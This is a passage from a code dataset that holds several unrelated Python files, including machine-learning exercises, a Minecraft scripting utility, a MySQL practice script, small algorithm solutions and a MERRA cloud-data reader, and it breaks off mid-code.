except:\n config.Rollback()\n status.Is_Err = 1\n status.Err_Message = str(sys.exc_info()[1])\n raise\n\n","sub_path":"dialogs/Beasiswa/fAddDataBeasiswaNasabah_data.py","file_name":"fAddDataBeasiswaNasabah_data.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"102967698","text":"\nfrom tkinter import *\n\n\nclass Application(Frame):\n \"\"\"GUI app with 3 buttons\"\"\"\n\n def __init__(self, master) :\n \"\"\"\"init the frame\"\"\"\n Frame.__init__(self,master)\n self.grid()\n self.create_widgets()\n\n def create_widgets (self):\n \"\"\"create 3 buttons \"\"\"\n #create the game title\n self.title = Label(self, text = \"Majority Rules\\nThe game of guessing what the world thinks\\n\")\n self.title.grid(sticky=N)\n\n self.instruction = Label(self, text = \"Enter a search term:\")\n self.instruction.grid(sticky=N)\n\n self.searchterm = Entry(self)\n self.searchterm.grid()\n \n #googleit button\n self.button1 = Button(self, text = \"Google it.\")\n self.button1.grid()\n\n #randomsearchterm button\n self.button2 = Button(self)\n self.button2.grid()\n self.button2.configure(text = \"I'm feeling lucky!\")\n\n self.QUIT = Button(self, text=\"Quit\", command=root.destroy)\n self.QUIT.grid()\n\n \nroot = Tk()\nroot.title(\"Majority Rules\")\nroot.geometry()\n\napp = 
Application(root)\n\nroot.mainloop()\n","sub_path":"tkinter_enter_searchterm.py","file_name":"tkinter_enter_searchterm.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137583251","text":"\r\n\r\nimport pandas as pd\r\ndiabetes_data = pd.read_csv(\"E:/360digiTMG assignment/Data Science/Ensemble technique/Datasets_ET/Diabeted_Ensemble.csv\")\r\n\r\n# Input and Output Split\r\npredictors = diabetes_data.loc[:, diabetes_data.columns!=\" Class variable\"]\r\ntype(predictors)\r\n\r\ntarget = diabetes_data[\" Class variable\"]\r\ntype(target)\r\n\r\n# Train Test partition of the data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(predictors, target, test_size = 0.2, random_state=0)\r\n\r\n# GridSearchCV\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrf_clf_grid = RandomForestClassifier(n_estimators=500, n_jobs=1, random_state=42)\r\n\r\nparam_grid = {\"max_features\": [4, 5, 6, 7, 8, 9, 10], \"min_samples_split\": [2, 3, 10]}\r\n\r\ngrid_search = GridSearchCV(rf_clf_grid, param_grid, n_jobs = -1, cv = 5, scoring = 'accuracy')\r\n\r\ngrid_search.fit(x_train, y_train)\r\n\r\ngrid_search.best_params_\r\n\r\ncv_rf_clf_grid = grid_search.best_estimator_\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\nconfusion_matrix(y_test, cv_rf_clf_grid.predict(x_test))\r\naccuracy_score(y_test, cv_rf_clf_grid.predict(x_test))\r\n\r\n#Bagging technique\r\nfrom sklearn import tree\r\nclftree = tree.DecisionTreeClassifier()\r\nfrom sklearn.ensemble import BaggingClassifier\r\n\r\nbag_clf = BaggingClassifier(base_estimator = clftree, n_estimators = 500,\r\n bootstrap = True, n_jobs = 1, random_state = 42)\r\n\r\nbag_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, bag_clf.predict(x_test))\r\naccuracy_score(y_test, bag_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, bag_clf.predict(x_train))\r\naccuracy_score(y_train, bag_clf.predict(x_train))\r\n\r\n#AdaBoosting technique\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\n\r\nada_clf = AdaBoostClassifier(learning_rate = 0.02, n_estimators = 5000)\r\n\r\nada_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, ada_clf.predict(x_test))\r\naccuracy_score(y_test, ada_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, ada_clf.predict(x_train))\r\naccuracy_score(y_train, ada_clf.predict(x_train))\r\n\r\n#Grddient boosting\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\n\r\nboost_clf = GradientBoostingClassifier()\r\n\r\nboost_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, boost_clf.predict(x_test))\r\naccuracy_score(y_test, boost_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, boost_clf.predict(x_train))\r\naccuracy_score(y_train, boost_clf.predict(x_train))\r\n\r\n# Hyperparameters\r\nboost_clf2 = GradientBoostingClassifier(learning_rate = 0.02, n_estimators = 1000, max_depth = 1)\r\nboost_clf2.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, 
confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, boost_clf2.predict(x_test))\r\naccuracy_score(y_test, boost_clf2.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, boost_clf2.predict(x_train))\r\naccuracy_score(y_train, boost_clf2.predict(x_train))\r\n\r\n#XGBoosting\r\nimport xgboost as xgb\r\n\r\nxgb_clf = xgb.XGBClassifier(max_depths = 5, n_estimators = 10000, learning_rate = 0.3, n_jobs = -1)\r\n\r\nxgb_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, xgb_clf.predict(x_test))\r\naccuracy_score(y_test, xgb_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, xgb_clf.predict(x_train))\r\naccuracy_score(y_train, xgb_clf.predict(x_train))\r\n\r\n#Voting technique\r\n# Import the required libraries\r\nfrom sklearn import linear_model, svm, neighbors, naive_bayes\r\nfrom sklearn.ensemble import VotingClassifier\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n# Instantiate the learners (classifiers)\r\nlearner_1 = neighbors.KNeighborsClassifier(n_neighbors=5)\r\nlearner_2 = linear_model.Perceptron(tol=1e-2, random_state=0)\r\nlearner_3 = svm.SVC(gamma=0.001)\r\n\r\n# Instantiate the voting classifier\r\nvoting = VotingClassifier([('KNN', learner_1),\r\n ('Prc', learner_2),\r\n ('SVM', learner_3)])\r\n\r\n# Fit classifier with the training data\r\nvoting.fit(x_train, y_train)\r\n\r\n# Predict the most voted class\r\nhard_predictions = voting.predict(x_test)\r\n\r\n# Accuracy of hard voting\r\nprint('Hard Voting:', accuracy_score(y_test, hard_predictions))\r\n\r\n# Soft Voting\r\n# Instantiate the learners (classifiers)\r\nlearner_4 = neighbors.KNeighborsClassifier(n_neighbors = 5)\r\nlearner_5 = naive_bayes.GaussianNB()\r\nlearner_6 = svm.SVC(gamma = 0.001, probability = True)\r\n\r\n# Instantiate the voting classifier\r\nvoting = VotingClassifier([('KNN', learner_4),\r\n ('NB', learner_5),\r\n ('SVM', learner_6)],\r\n voting = 'soft')\r\n\r\n# Fit classifier with the training data\r\nvoting.fit(x_train, y_train)\r\nlearner_4.fit(x_train, y_train)\r\nlearner_5.fit(x_train, y_train)\r\nlearner_6.fit(x_train, y_train)\r\n\r\n# Predict the most probable class\r\nsoft_predictions = voting.predict(x_test)\r\n\r\n# Get the base learner predictions\r\npredictions_4 = learner_4.predict(x_test)\r\npredictions_5 = learner_5.predict(x_test)\r\npredictions_6 = learner_6.predict(x_test)\r\n\r\n# Accuracies of base learners\r\nprint('L4:', accuracy_score(y_test, predictions_4))\r\nprint('L5:', accuracy_score(y_test, predictions_5))\r\nprint('L6:', accuracy_score(y_test, predictions_6))\r\n\r\n# Accuracy of Soft voting\r\nprint('Soft Voting:', accuracy_score(y_test, soft_predictions))\r\n","sub_path":"diabetes.py","file_name":"diabetes.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"291588959","text":"# ispred lika crta more baklji po tlu\n\nimport time\nfrom mc import * # import api-ja\nfrom crtanje import * # tu je funkcija koju zovem\n\nmc = Minecraft() # inicijalizacija sustava za rad sa Minecraftom\nimport time\n\nzaObradu = [GRASS.id, SANDSTONE.id, SAND.id, STONE.id, DIRT.id, GRAVEL.id, COBBLESTONE.id, CLAY.id, GOLD_ORE.id,\n IRON_ORE.id, COAL_ORE.id, DIAMOND_ORE.id, OBSIDIAN.id, REDSTONE_ORE.id, LAPIS_LAZULI_ORE.id,\n 129] # 129 emerald\n\npopis = dict()\n\n\ndef stoneCutter(orMj, orSm, 
dimenzije=5, visina=5):\n    a = 1\n    for dY in range(visina, -1, -1):\n        mc.postToChat(\"Level: %s \" % dY)\n        for dZ in range(-3 - dY, 3 + dY):\n            for dX in range(1, dimenzije + 1 + dY):\n                a += 1\n\n                gdje = rel2abs((int(orMj[0]), int(orMj[1]), int(orMj[2])), (dX, dZ, dY), orSm)\n                # id = mc.spawnEntity('Minecart', int (gdje [0]) ,int (gdje [1]) ,int (gdje [2]) , \"{Type:0}\" )\n                # block = getBlockWithData( int (gdje [0]) ,int (gdje [1]) ,int (gdje [2]))\n                myBlock = mc.getBlockWithData(int(gdje[0]), int(gdje[1]), int(gdje[2]))\n\n                if myBlock.id in (10, 11):  # remove lava\n                    mc.setBlock(int(gdje[0]), int(gdje[1]), int(gdje[2]), AIR.id, 0)\n                if myBlock.id in zaObradu:\n                    a = a + 1\n                    # time.sleep ( 0.5 )\n                    mc.setBlock(int(gdje[0]), int(gdje[1]), int(gdje[2]), AIR.id, 0)\n\n                    # dict.has_key() no longer exists in Python 3; use `in`\n                    if (myBlock.id, myBlock.data) in popis:\n                        popis[(myBlock.id, myBlock.data)] += 1\n                    else:\n                        popis[(myBlock.id, myBlock.data)] = 1\n\n    # time.sleep ( 0.5 )\n    # myId = mc.spawnEntity('Item', int (gdje [0]) ,int (gdje [1]) ,int (gdje [2] ) , sto )\n\n    for bla in popis.keys():\n        blok = bla[0]\n        modifikacija = bla[1]\n        # translations (block id -> item id):\n        # diamond\n        # 56 : 264,\n        if bla[0] == 56:\n            blok = 264\n        # redstone\n        # 73 : 331 ,\n        if bla[0] == 73:\n            blok = 331\n        # lapis\n        # 21 : 351 , 4\n        if bla[0] == 21:\n            blok = 351\n            modifikacija = 4\n        # emerald\n        # 129 : 388\n        if bla[0] == 129:\n            blok = 388\n        # coal COAL_ORE.id 263\n        if bla[0] == COAL_ORE.id:\n            blok = 263\n            modifikacija = 0\n\n        mc.postToChat(\"Key: %s %s \" % (bla[0], bla[1]))\n        mc.postToChat(\"Value: %s \" % popis[bla])\n        while popis[bla] > 0:\n            if popis[bla] > 64:\n                sto = ('{Item:{id:%s,Count:%s,Damage:%s}}' % (blok, 64, modifikacija))\n            else:\n                sto = ('{Item:{id:%s,Count:%s,Damage:%s}}' % (blok, popis[bla], modifikacija))\n\n            mc.postToChat(\"XXX: %s \" % (sto))\n            gdje = rel2abs(orMj, (0, 0, 3), orSm)\n            time.sleep(6)\n            myId = mc.spawnEntity('Item', int(gdje[0]), int(gdje[1]), int(gdje[2]), sto)\n            popis[bla] -= 64\n\n    mc.postToChat(\"Kraj : XXXXXXXXXXXX\")\n    return 1\n\n\nif __name__ == \"__main__\":  # direct call\n    orMj = gdjeSam()\n    orSm = gdjeGledam()\n    stoneCutter(orMj, orSm, dimenzije=35, visina=5)\n    # bakljada (dimenzije = 200 , visina = 80)\n","sub_path":"dugiStoneCutter.py","file_name":"dugiStoneCutter.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"202494647","text":"from office365.runtime.client_value import ClientValue\n\n\nclass Folder(ClientValue):\n\n    def __init__(self, childCount=None, view=None):\n        \"\"\"\n\n        :param int childCount:\n        :param office365.onedrive.folderView.FolderView view:\n        \"\"\"\n        super(Folder, self).__init__()\n        self.childCount = childCount\n        self.view = view\n","sub_path":"office365/onedrive/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"480263024","text":"# coding=utf8\n\nimport argparse\nimport numpy as np\nfrom tensorflow.python import pywrap_tensorflow\n\n\ndef fetch(checkpoint_path, tensor_name, save_path=None):\n    reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)\n    var_to_shape_map = reader.get_variable_to_shape_map()\n    target_tensor = None\n    for key in var_to_shape_map:\n        if tensor_name == key:\n            target_tensor = reader.get_tensor(key)\n            break\n    print(target_tensor)\n    if save_path and isinstance(target_tensor, 
np.ndarray):\n np.save(save_path, target_tensor)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--checkpoint\", help=\"Checkpoint path\", required=True)\n parser.add_argument(\"--tensor\", help=\"Tensor name\", required=True)\n parser.add_argument(\"--save\", help=\"Save path\", required=False)\n args = parser.parse_args()\n\n fetch(args.checkpoint, args.tensor, args.save)\n","sub_path":"baseline_with_case/tools/fetch_embedding_from_checkpoint.py","file_name":"fetch_embedding_from_checkpoint.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"363733558","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 12 12:02:57 2017\n\n@author: fmonnery\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndatas = pd.read_csv('D:\\WorkSpace\\_Machine_Learning\\house_data.csv')\n\ndata = datas.dropna()\nZ = data.isnull().sum().sum() \n \nt=data['surface']\nx=data['price']\ny=data['arrondissement']\n\nprint(\"----------------------Calcul des coefficients---------\")\nXi=np.matrix([np.ones(data.shape[0]),data['surface'].as_matrix(),y.as_matrix()]).T\nYi=np.matrix(data['price']).T\n\nThetus = np.linalg.inv(Xi.T.dot(Xi)).dot(Xi.T).dot(Yi)\n\nAbscisse=[0,400]\nOrdonnee=[Thetus.item(0)+Abscisse[0]*Thetus.item(1),Thetus.item(0)+Abscisse[1]*Thetus.item(1)]\nDim_Z = [Thetus.item(0)+Abscisse[0]*Thetus.item(2),Thetus.item(0)+Abscisse[1]*Thetus.item(2)]\n\nprint(\"Origine : \",Thetus.item(0))\nprint(\"Coefficient n° 1 : \",Thetus.item(1))\nprint(\"Coefficient n° 2 : \",Thetus.item(2))\n\nprint(\"----------------------Représentation en 3 dimensions---------\")\nax = plt.subplot(111, projection='3d')\nax.scatter(t,x,c=y)\nax = plt.plot(Abscisse,Ordonnee,Dim_Z,linestyle='--',c='#000000')\n\nplt.legend(y)\nplt.show()\n\nprint(\"----------------------Représentation sur 2 dimensions---------\")\nasc = plt.scatter(t,x,c=y)\nasc = plt.plot(Abscisse,Ordonnee,linestyle='--',c='#000000')\nplt.show()\n\nprint(\"----------------------Calcul de la qualité du modèle---------\")\nMat = np.matrix([t.as_matrix(),y.as_matrix(),x.as_matrix()])\ni=0\nprediction = np.empty(data.shape[0])\nerreur = np.empty(data.shape[0])\n\nwhile i < data.shape[0]:\n prediction[i] = Thetus.item(0) + Mat[0].item(i)*Thetus.item(1) + Mat[1].item(i)*Thetus.item(2)\n erreur[i] = np.sqrt((prediction[i] - Mat[2].item(i))**2)\n i += 1 \n\nresidu = erreur.mean() \n\nprint (\"Erreur de prédiction moyenne : \",residu) \nprint (\"Erreur de prédiction cumulée : \",erreur.sum()) \n\ndonnees = np.asarray(Yi).reshape(-1)\n\nCompare = np.matrix([donnees,prediction,erreur])\n\nprint(\"----------------------Prédiction sur données---------\")\nprint(\"Prix du loyer pour une surface de 50 m² : \",Thetus.item(0) + 50*Thetus.item(1) + 10*Thetus.item(2))\n\n\n\n\n\n\n \n \n \n\n \n\n\n\n","sub_path":"OpenClassRoom - Data Scientist/2017-05-25 - Regression Lineaire/1-Representation-Data.py","file_name":"1-Representation-Data.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63031990","text":"#! 
/usr/bin/python\n\ndef goodness_of_fit(a1, a2):\n\n    import math\n\n    diff2 = [(x-y)**2 for x,y in zip(a1,a2)]\n    return math.sqrt(sum(diff2)/(max(a1)-min(a1))**2/len(a1))\n\ndef main():\n\n    import os\n    import imp\n    enrs = imp.load_source('enrs',os.environ['RICH_ROOT']+'/analytic/enrs.py')\n\n    import numpy\n    import h5py\n\n    left = enrs.Primitive(1,10,0)\n    right = enrs.Primitive(1,1,0)\n    prof = enrs.RiemannProfile(left,right,5./3.)\n    offset = 0.5\n\n    h5file = h5py.File('final.h5','r')\n    t = h5file['time']\n    x = h5file['grid']\n    d = h5file['density']\n    p = h5file['pressure']\n    v = h5file['x_velocity']\n    da = [prof.CalcPrim((i-offset)/t).Density for i in x]\n    pa = [prof.CalcPrim((i-offset)/t).Pressure for i in x]\n    va = [prof.CalcPrim((i-offset)/t).Velocity for i in x]\n\n    gof1 = goodness_of_fit(d,da)\n    gof2 = goodness_of_fit(p,pa)\n    gof3 = goodness_of_fit(v,va)\n\n    f = open('gradesheet.txt','w')\n    f.write(str(gof1)+'\\n')\n    f.write(str(gof2)+'\\n')\n    f.write(str(gof3)+'\\n')\n    f.close()\n\n    return gof1<0.14 and gof2<0.06 and gof3 < 0.13\n\nif __name__=='__main__':\n\n    import os\n\n    if main():\n        os.system('touch test_passed.res')\n    else:\n        os.system('touch test_failed.res')\n\n","sub_path":"lib/SurfacingAlgorithms/huji-rich-Elad3DFast/tests/newtonian/one_dimensional/riemann_profiles_1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"199128378","text":"import MySQLdb\n\n\n# open the database connection\ndb = MySQLdb.connect(\"localhost\", \"testuser\", \"testuser123\", \"TESTDB\")\n\n\n# get a cursor with the cursor() method\ncursor = db.cursor()\n\n# run a SQL statement with the execute() method\ncursor.execute(\"SELECT VERSION()\")\n\n# fetch a single row with the fetchone() method\ndata = cursor.fetchone()\n\n# drop the table if it already exists\ncursor.execute(\"DROP TABLE IF EXISTS EMPLOYEE\")\n\n# SQL statement to create the table (the original spelled the first\n# column FRIST_NAME, which broke the INSERT below)\nsql = \"\"\"CREATE TABLE EMPLOYEE(\n         FIRST_NAME CHAR(20) NOT NULL,\n         LAST_NAME CHAR(20),\n         AGE INT,\n         SEX CHAR(1),\n         INCOME FLOAT)\"\"\"\ncursor.execute(sql)\n\n\n# SQL insert statement\nsql = \"\"\"INSERT INTO EMPLOYEE(FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)\n         VALUES('MAC','Mohan',20,'M', 2000)\"\"\"\n\ntry:\n    # execute the insert and commit it to the database\n    cursor.execute(sql)\n    db.commit()\n\n    # a SELECT is needed before fetchall() has any rows to return\n    cursor.execute(\"SELECT * FROM EMPLOYEE\")\n    results = cursor.fetchall()\n    for row in results:\n        fname = row[0]\n        lname = row[1]\n        age = row[2]\n        sex = row[3]\n        income = row[4]\n        print(\"fname=%s, lname=%s, age=%d, sex=%s, income=%d\" % \\\n              (fname, lname, age, sex, income))\nexcept:\n    print(\"Error: unable to fetch data\")\n    # rollback in case there is any error\n    db.rollback()\n\n\nprint(\"database version : %s\" % data)\n\n# close the database connection\n\ndb.close()","sub_path":"practice-mysql.py","file_name":"practice-mysql.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"193496508","text":"fact = {}\ndef Factorial(a):\n\tif a <= 1:\n\t\treturn 1\n\telse:\n\t\treturn a * Factorial(a - 1)\n\nfor i in range(0, 10):\n\tfact[i] = Factorial(i)\n\ne = 10\nfor i in range(11, 1000000):\n\tsummation = 0\n\tif i % (e * 10) == 0:\n\t\te *= 10\n\tj = 1\n\twhile True:\n\t\tsummation += fact[(i // j) % 10]\n\t\tif summation > i:\n\t\t\tbreak\n\t\telif j == e:\n\t\t\tbreak\n\t\tj *= 10\n\tif summation == i:\n\t\tprint(i)\n","sub_path":"Dfact.py","file_name":"Dfact.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"581332553","text":"class Solution(object):\n    def 
maxProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n\n ret = nums[0]\n max_l = [nums[0]]\n min_l = [nums[0]]\n\n for i in range(1, len(nums)):\n max_now = max((max_l[i - 1] * nums[i], min_l[i - 1] * nums[i], nums[i]))\n min_now = min((max_l[i - 1] * nums[i], min_l[i - 1] * nums[i], nums[i]))\n ret = max(ret, max_now)\n max_l.append(max_now)\n min_l.append(min_now)\n\n return ret\n","sub_path":"leetcode/algorithm/maximum-product-subarray.py","file_name":"maximum-product-subarray.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"131437114","text":"#!usr/bin/env python\nfrom calendar import monthrange\nimport h5py\nimport os\nfrom os.path import join, realpath, dirname, exists\nfrom netCDF4 import Dataset\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.cm import ScalarMappable\nfrom matplotlib.colors import Normalize\n\nfrom ..utils import time_utils\nfrom ..utils import orbit_utils\n\nfrom .earthdata import re_km\n\nimport warnings\n\n# location of MERRA files\nmerra_dir = realpath(join(dirname(__file__), '..', '..', 'MERRA_Data'))\nfilepath = join(\n merra_dir, '{Y}', '{m}', 'MERRA2_400.tavg3_3d_asm_Nv.{strf8}.nc4')\n\n# lat and lon resolutions of merra data\nlonres = 0.625\nlatres = 0.5\n\n\nclass Clouds(object):\n \"\"\"\n The Clouds class transfers data from MERRA-2\n HDF5 files into class attributes to be used \n in other parts of the code. \n \n One of the most important aspects of this class\n is its ability to interpolate cloud fractions \n between the times provided in the files.\n \n Also contains a plotting method to show the \n global cloud cover.\n \"\"\"\n \n def __init__(self, time):\n \"\"\"\n Initialize the Clouds instance.\n \n args:\n \n time - time_utils.Time instance. The\n time associated with the cloud\n data to be read in. 
As MERRA \n comes in daily files, only the\n year, month and date of the time\n instance are considered\n \"\"\"\n # get the filename for the date in question\n self.fname = filepath.format(Y=time.strftime(\"%Y\"), m=time.strftime(\"%m\"), strf8=time.strftime(\"%Y%m%d\"))\n if not os.path.exists(self.fname):\n raise IOError(\"Specified MERRA data file {0} does not exist\".format(self.fname))\n print(\"Reading cloud data from MERRA file\", self.fname)\n self.merra = Dataset(self.fname, 'r')\n\n # save MERRA datasets as attributes\n # suppress some weird warning: valid_range not used since it cannot be safely cast to variable data type\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n self.time = self.merra.variables[\"time\"][:]\n self.cloud = self.merra.variables[\"CLOUD\"][:]\n \n \n # Get the times corresponding to each time step in the dataset\n if type(time) == type(dt.datetime(2015,5,5)):\n time = time_utils.Time(time, time)\n d0 = dt.datetime(time.datetime.year, time.datetime.month, time.datetime.day, 1, 30)\n t0 = time_utils.Time(d0, time.ref)\n self.times = [t0 + 60*t for t in self.time]\n \n \n # take the maximum value along the vertical axis\n self.cloud = np.amax(self.cloud, axis=1)\n \n \n # append the first column of lons to the end, \n # so that locations in the range (179.6875 E, 180 E]\n # can get assigned the proper cloud fraction values\n first_cld = np.array([np.vstack(self.cloud[k,:,0]) for k in range(self.cloud.shape[0])])\n self.cloud = np.append(self.cloud, first_cld, axis=2)\n \n def __call__(self, time):\n \"\"\"\n Perform a linear interpolation of \n the cloud data along the time axis.\n \n args:\n \n time - time_utils.Time instance. The\n exact time the data will get\n interpolated to. If the time \n falls outside the first and last\n time steps, then the first or\n last set of values will be returned\n \"\"\"\n # return the first timestep's array for low values\n if type(time) == type(dt.datetime(2015,5,5)):\n time = time_utils.Time(time, time)\n \n if time.datetime <= self.times[0].datetime:\n return self.cloud[0,:,:]\n \n # return the last timestep's array for high values\n elif time.datetime > self.times[-1].datetime:\n return self.cloud[-1,:,:]\n \n else:\n # find the time steps that bound the new time\n for k in range(len(self.times)-1):\n if self.times[k].datetime < time.datetime <= self.times[k+1].datetime:\n lower = k\n upper = k+1\n \n # create the weights for the intepolation\n tlower = 0\n tupper = self.times[upper] - self.times[lower]\n t = time - self.times[lower]\n \n wlower = (t - tupper)/(tlower-tupper)\n wupper = (t - tlower)/(tupper-tlower)\n \n # interpolate cloud values to the new time\n cld = wlower*self.cloud[lower,:,:] + wupper*self.cloud[upper,:,:]\n \n return cld\n \n \n def show_clouds_ortho(self, time, centre, map_bkgd='bluemarble', out='show'):\n \"\"\"\n Show an orthographic projection with \n cloud cover that ranges from transparent\n for small cloud fraction, to white to\n grey.\n \n args:\n \n time - time_utils.Time instance that the\n cloud field will get interpolated to\n and shown for.\n \n centre - tuple of (lat, lon), indicating the\n centre of the orthographic projection\n \n map_bkgd - string to indicate what kind of back-\n ground will be used for the image. 
\n Can be any of 'bluemarble', 'etopo',\n or 'mask'\n \n out - string to indicate what kind of output\n should be provided\n \"\"\"\n if type(time) == type(dt.datetime(2015, 4, 4)):\n time = time_utils.Time(time, time)\n\n def col(x):\n \"\"\"\n Function that provides RGBA values\n for a given cloud fraction between\n 0 and 1. \n \"\"\"\n \n # get RGB value\n c = 1. - 0.3*x**2.\n \n # transparent if c.f. < 0.1\n if x < 0.1:\n return (c,c,c,0)\n \n # opaque if c.f. > 0.7\n elif x > 0.7:\n return (c,c,c,1.)\n \n # translucent if 0.1 < c.f. < 0.7\n else:\n return (c,c,c,np.clip((x - 0.1)/0.7, 0., 1.)**2.)\n \n # draw map projection\n projection = Basemap(projection='ortho', lat_0=centre[0], lon_0=centre[1], resolution='c')\n \n # determine what kind of background\n # is needed, and draw it\n if map_bkgd == 'bluemarble':\n projection.bluemarble()\n elif map_bkgd == 'etopo':\n projection.etopo()\n elif map_bkgd == 'mask':\n projection.drawlsmask(land_color='limegreen', ocean_color='dodgerblue', resolution='l')\n \n projection.drawcoastlines(linewidth=0.75)\n projection.drawcountries(linewidth=0.5)\n projection.drawmeridians(np.arange(-180, 181, 30), latmax=90)\n projection.drawparallels(np.arange(-90, 91, 15), latmax=90)\n else:\n raise ValueError('invalid map background specification')\n \n # use a call to interpolate the cloud \n # fields to the needed time \n cf = self(time)\n\n # define MERRA lat and lon grid\n lats = np.arange(-90., 90.25, 0.5)\n lons = np.arange(-180., 180.3125, 0.625)\n lons, lats = np.meshgrid(lons, lats)\n \n # define contour levels and colors\n levs = np.linspace(0,1,256, endpoint=True)\n clevs = [col(x) for x in levs]\n \n # get the map projection coordinates\n # and mask the cloud data, so that lcoations\n # on the opposite side of th Earth don't get\n # drawn\n x, y = projection(lons, lats)\n \n cfmask = np.ma.masked_greater(x, 1e15).mask\n cfmasked = np.ma.array(cf, mask=cfmask)\n \n # draw contour\n plt.contourf(x, y, cfmasked, levs, colors=clevs, extend='both')\n \n # supply specified output\n if out == 'show':\n plt.show()\n elif out == '':\n pass\n else:\n plt.savefig(out)\n return cfmask\n\n def get_clouds(self, time, centre, map_bkgd='bluemarble', out='show'):\n \"\"\"show_clouds_ortho, but without the plotting stuff\"\"\"\n # use a call to interpolate the cloud \n # fields to the needed time \n cf = self(time)\n return cf\n\nclass CloudCollection(object):\n \n \"\"\"\n Very Similar class to the above Clouds, but\n the CloudCollection class has the ability to\n concatenate arrays from multiple MERRA files,\n so that more than 1 day's worth of values can\n be collected.\n \n The methods to interpolate to specfied times\n and to show an orthographic projection of the\n cloud field values are repeated as well.\n \"\"\"\n \n def __init__(self, time_middle, obs_period):\n \"\"\"\n Intialize the CloudCollention instance.\n \n args:\n \n time_middle - the midpoint in time of the\n period for which cloud fields\n are needed\n \n obs_period - The total length of time for which\n the cloud fields are needed. 
Units\n are in seconds\n \"\"\"\n print(\"Opening cloud files for a time interval centered at {} UTC\".format(time_middle.datetime))\n \n self.time_middle = time_middle\n self.obs_period = obs_period\n \n # find the endpooints of the time period\n obs_start = time_middle - (obs_period//2+3600)\n obs_end = time_middle + (obs_period//2+3600)\n self.obs_start = obs_start\n self.obs_end = obs_end\n \n # The first time step in the MERRA daily files\n # is at 01:30 UTC, and the final one is at 22:30\n # UTC. Therefore, if the endpoints sit outside this\n # range, an extra day will have to be loaded so \n # that all the necessary interpolations can be done\n merra_start = dt.datetime(obs_start.datetime.year, obs_start.datetime.month, obs_start.datetime.day, 1, 30)\n merra_end = dt.datetime(obs_end.datetime.year, obs_end.datetime.month, obs_end.datetime.day, 22, 30)\n \n # check if the starting point occurs\n # before 01:30 UTC\n if obs_start.datetime < merra_start:\n merra_start -= dt.timedelta(seconds=86400)\n \n # check if the ending point occurs\n # after 22:30 UTC \n if obs_end.datetime > merra_end:\n merra_end += dt.timedelta(seconds=86400)\n \n # append all the necessary dates to a list\n dates = []\n cdate = merra_start.date()\n while cdate <= merra_end.date():\n dates.append(dt.datetime(cdate.year, cdate.month, cdate.day, 12))\n cdate += dt.timedelta(days=1)\n \n # create a cloud instance for each day,\n # and concatenate their arrays together\n # to get the full arrays for the CloudCollection \n clouds = []\n for d in dates:\n t = 